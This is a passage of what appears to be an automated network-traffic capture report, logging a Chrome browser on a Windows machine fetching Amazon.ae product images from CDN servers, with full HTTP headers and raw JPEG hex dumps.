                                                                                                                                                                                                                                                                      Age: 2169093
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000074-IAD, cache-nyc-kteb1890033-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 c8 00 a0 03 01 22 00 02 11 01 03 11 01 ff c4 00 89 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 08 03 02 01 10 00 02 01 03 02 03 04 05 08 06 06 08 07 00 00 00 01 02 03 00 04 11 05 12 21 31 41 06 07 13 51 22 32 61 71 81 14 42 52 72 91 92 a1 b1 16 23 62 a2 c1 d1 17
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"!1AQ"2aqBRr#b
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: 89 5f 1e c4 5b c9 1b 59 a3 da bb 92 4a 2e d6 88 81 cc bc 40 95 fb b8 39 3c 4d 2b b7 89 4c 96 b1 28 c2 a8 69 08 fd c8 54 fc 0e 47 b6 3a 58 f7 1e 1b 3c a0 6e 67 70 91 af 2c ed c9 3c 7a 0c e4 b1 f2 5a 08 4e b9 de 2c 5d 95 31 c7 aa a1 62 e3 21 e0 19 e1 c7 8b 23 10 cb c8 d6 3f ef ab bc c1 db 0b fb 34 b1 39 b4 8c a7 80 59 4a a4 8c fc 1d 9f e3 e8 10 7d 40 3f 6d b1 ab fb d7 ec df cb f4 d5 bb 69 4a c9 6b bc bc 8a be 90 89 b8 c9 b1 46 49 64 da 1d 7d c6 b0 c5 cd f8 ed 0d d0 bb ba 8c 0b 75 42 91 c0 0f 08 a2 f9 83 c8 b2 fa ce 46 dd e4 93 ce 82 f0 ee f5 2e ac ee e0 d0 2e 20 7b fb 71 2a c8 65 84 f8 53 d8 4e 71 1b 48 1c 10 ec 89 90 37 67 80 25 6b 62 59 da 25 9c 49 0c 63 0a 83 e2 7a 92 7d a4 f1 27 a9 aa 4f b8 23 61 1e 9f 73 0d a1 f1 5d 5d 33 3e 77 17 41 ea 23 72 2a 62 c9
                                                                                                                                                                                                                                                                      Data Ascii: _[YJ.@9<M+L(iTG:X<ngp,<zZN,]1b!#?49YJ}@?miJkFId}uBF.. {q*eSNqH7g%kbY%Icz}'O#as]]3>wA#r*b
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1378INData Raw: 4d 2a f1 94 8d 87 6f 92 0f 4b c2 8b 3d 78 b3 63 86 e3 e9 07 fd 3f 4c 4b 31 9f 59 c8 e2 ff 00 8e 14 71 c2 e7 a6 49 3c d8 92 49 aa fb f4 a2 4d 3d 0e c0 a7 a9 24 12 58 f9 b3 67 24 d2 3b 1e f4 c4 b7 50 da 49 6f c6 57 0a 19 5f 18 cf 98 22 81 d3 bd 09 b3 63 6b 6c 4e 04 f7 31 86 fa b1 83 2f e6 a2 b2 06 b8 56 59 e7 7c f0 2e 70 7c ab 42 77 b3 da 04 b9 0b 1d b2 ef 7b 15 77 9b e8 aa ba e1 58 1a c9 57 3a fc 57 04 85 6e 39 e5 ca 82 ed ee 17 b2 b0 ea 7a 9d fd fd ca 07 5b 28 95 50 1e 23 7c fb b2 de f4 45 fd fa 68 ed 17 6f ee 7b 1d af df 41 61 1f 8f a6 c1 2e c6 b6 73 c7 7a 70 95 a1 6e 3e 1e 1f 2a 17 8a 9d b4 f7 dd 7c f7 c9 69 a1 25 8d cf c9 fe 5b af cd e3 e1 43 78 b1 5b 5b 78 c6 3f 73 84 22 aa 8b 99 05 ef 89 70 fc e6 77 73 d7 8b 92 e6 83 50 f6 37 5f b2 d7 6d cd f6 81 2f
                                                                                                                                                                                                                                                                      Data Ascii: M*oK=xc?LK1YqI<IM=$Xg$;PIoW_"cklN1/VY|.p|Bw{wXW:Wn9z[(P#|Eho{Aa.szpn>*|i%[Cx[[x?s"pwsP7_m/
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC1282INData Raw: 50 6a 7e eb 13 6e 89 67 ed 2f f9 d5 dd 62 bc aa a4 ee da d4 a6 8d a7 8f d8 ab 92 c2 2a 09 05 b8 a6 3e d6 5d 88 e2 8a 11 cd b2 69 ed e7 4b 48 cc b2 1c 01 c8 75 63 e4 2a bc bf f1 35 37 96 56 38 66 f5 47 90 1f c1 68 22 8e 78 d7 ca 55 2d 9c 90 70 75 3e fc 70 a2 15 5e a2 81 4c 09 fa af 8d 46 7b 69 66 f7 3a 5d c0 8c 64 c6 51 f1 ec 8d 83 37 d8 38 d4 ba 21 c3 14 e9 6d 6d b8 83 41 55 f7 4f ab a5 84 f7 56 ec 70 ed b9 be ba b1 56 c8 ad 29 69 ab 46 e0 71 aa 3e fb ba c5 79 96 e3 4e 98 40 54 e4 44 db 94 46 4f f7 52 2e 59 47 ec 10 c2 a5 fa 36 83 7c 9b 1e ee 60 00 f9 8a 38 b7 1f 9c 70 b8 e1 9c 00 bc 4e 33 c2 82 77 75 38 9e 52 57 fb a9 07 e0 4d 3b 54 7a 05 02 55 51 c0 64 8f 60 c8 2b 52 18 09 31 a1 3f 44 50 14 51 45 01 51 fe d1 de 5e c7 93 6b 1e e1 17 1e 59 cb 74 07 99 03
                                                                                                                                                                                                                                                                      Data Ascii: Pj~ng/b*>]iKHuc*57V8fGh"xU-pu>p^LF{if:]dQ78!mmAUOVpV)iFq>yN@TDFOR.YG6|`8pN3wu8RWM;TzUQd`+R1?DPQEQ^kYt


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      126192.168.2.549871151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC610OUTGET /images/I/51nuyTB+MuL._AC_SY200_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 2578
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 378d0995-d614-4c38-af61-894191c5050b
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sat, 21 Oct 2023 08:07:49 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Wed, 01 Jun 2044 14:40:17 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 708602
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kcgs7200131-IAD, cache-ewr-kewr1740054-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 c8 00 55 03 01 22 00 02 11 01 03 11 01 ff c4 00 88 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 06 05 07 08 10 00 02 01 03 03 01 03 0a 04 05 03 05 00 00 00 00 01 02 00 03 11 21 04 12 31 41 22 51 61 05 13 71 72 81 91 a1 b1 c1 f0 32 52 62 e1 14 23 b2 c2 d1 06 07 f1
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*U"!1A"Qaqr2Rb#
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1200INData Raw: 08 d0 61 2a c4 cc e5 f1 83 2e 4c 51 84 40 68 9a 8f 9a 7d e5 ff 00 b5 84 7d 8c 43 5b 72 5c f2 c7 fa 5a 46 95 2f db 6f 55 7e 6d 25 49 95 16 dc 7d 55 f9 b6 25 c1 f8 42 86 cd bf e6 10 73 6e 90 83 51 4f 88 e1 63 10 98 19 e2 fe 8f ac bd c1 bf 43 e9 07 c0 7b bd a7 be 11 a1 00 12 db b1 33 ee f1 80 17 97 59 39 9e d6 94 0c 4c 5b 01 63 f7 f4 8b 2a 3f 6f b1 01 c1 ba c4 39 b9 a6 3f 57 f6 b4 62 81 61 13 57 b3 b3 bb 77 f6 b4 8d 2d b8 06 60 3f 2a fc da 1b bb cf 1f 08 ab f6 db d5 5e be 2d 25 4d ed 0a be f8 49 0e a3 98 4b a2 0d 51 6e 7b ed dd 2c ad cd b3 f7 e9 89 7a 8b 6b de ff 00 03 18 af 22 1d 78 13 79 4b ca 6e 95 0c bf 12 9b 8e 22 cb 48 26 43 0d 2d b4 8f 0f 6c cf 53 3b 0f ea fe d3 02 e6 d1 55 18 f6 3d 71 f5 f0 85 3a f6 66 c7 0a bf 02 d2 22 8b 5e a1 f5 47 cc c0 b7 df d8
                                                                                                                                                                                                                                                                      Data Ascii: a*.LQ@h}}C[r\ZF/oU~m%I}U%BsnQOcC{3Y9L[c*?o9?WbaWw-`?*^-%MIKQn{,zk"xyKn"H&C-lS;U=q:f"^G


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      127192.168.2.54985618.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC689OUTGET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871142_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4816
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 3bc429e0-f985-422b-9ae4-2a938740f034
                                                                                                                                                                                                                                                                      Date: Mon, 29 Jul 2024 09:42:52 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 23 Jul 2024 07:16:18 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-057,/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871142_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 24 Jul 2044 09:42:52 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-057 /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871142_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 47168233f5be3757636a095d7386d7d8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 475708
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: xfwTZIaTFJi48aGi5_9iIsxZidvwAHnNDAvvYx4Q9Slc_Ub9FJQ8zA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4816INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 14 0f 0f 0c 0f 0f 1a 13 0e 13 11 18 0f 11 11 18 11 18 18 11 15 18 15 15 1b 18 14 14 18 1b 15 18 19 25 19 1d 1a 20 1b 19 23 19 25 19 25 24 24 26 29 2a 25 18 29 38 01 09 09 05 09 09 09 0c 09 09 14 23 18 0f 1b 24 1d 0c 19 2b 24 2a 1b 24 26 24 24 1a 2f 24 2a 23 24 15 25 24 1b 20 20 1b 1b 1d 19 1d 24 1b 26 26 25 0f 1a 26 23 18 32 1a 1b 18 24 23 29 20 18 26 2d ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 a4 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 05 06 07 01 04 08 03 10 00 02 01 03 02 03 04 06 06 08 06 03 00 00 00 00 01 02 03 00 04 11 05 12 06 21 31 07 13 41 51 14 22 52 61 91 d2 15 16 32 71 72 b1 24 33 36 42 73 81 93 d1
                                                                                                                                                                                                                                                                      Data Ascii: JFIF% #%%$$&)*%)8#$+$*$&$$/$*#$%$ $&&%&#2$#) &-t"!1AQ"Ra2qr$36Bs


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      128192.168.2.54985518.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC378OUTGET /images/I/41BEfYOD4rL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC841INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 6016
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 6cfafb73-9c5a-4baa-ae39-7aee1be5b3c6
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 08:58:01 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sun, 19 Sep 2021 18:09:19 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-030,/images/I/41BEfYOD4rL
                                                                                                                                                                                                                                                                      Expires: Tue, 16 Aug 2044 08:58:01 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-030 /images/I/41BEfYOD4rL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 411234c039d8f1de63b7f2192e5e24d4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 34247
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 33PRT-KvEM37Lb1cI4T7amxX-cPWSRu-X2qFYTvc22dGIQsDNn-G3A==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC6016INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 2f 00 01 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 01 02 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00 00 01 e5 b9 80 f5
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"/


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      129192.168.2.54985918.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924049_186x116_1X_en_AE._SY116_CB566513572_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4245
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: bd67d663-70d2-4aca-8188-524f03ad74a1
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 19:00:59 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 13:34:03 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-023,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924049_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 19:00:59 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-023 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924049_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 8e8e0fdfe938f4dbcfa8bb4284454f5a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 348358
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: p1VU0BUUj9SzwKSDUXyiMBWu2V6BgX_jyy1WKufIEa7poECd8ub0gA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4245INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 38 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 08 09 05 06 07 01 03 0a 04 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 07 08 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b6 41 dc 7c ee 16 df 17 31 1c
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"8A|1


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      130192.168.2.549866151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC463OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Cleaning_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3984
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: a527de84-f578-481e-8ee5-cd3ea852d95a
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 12 Aug 2024 12:10:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Sun, 07 Aug 2044 12:37:47 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 429997
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100131-IAD, cache-ewr-kewr1740070-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
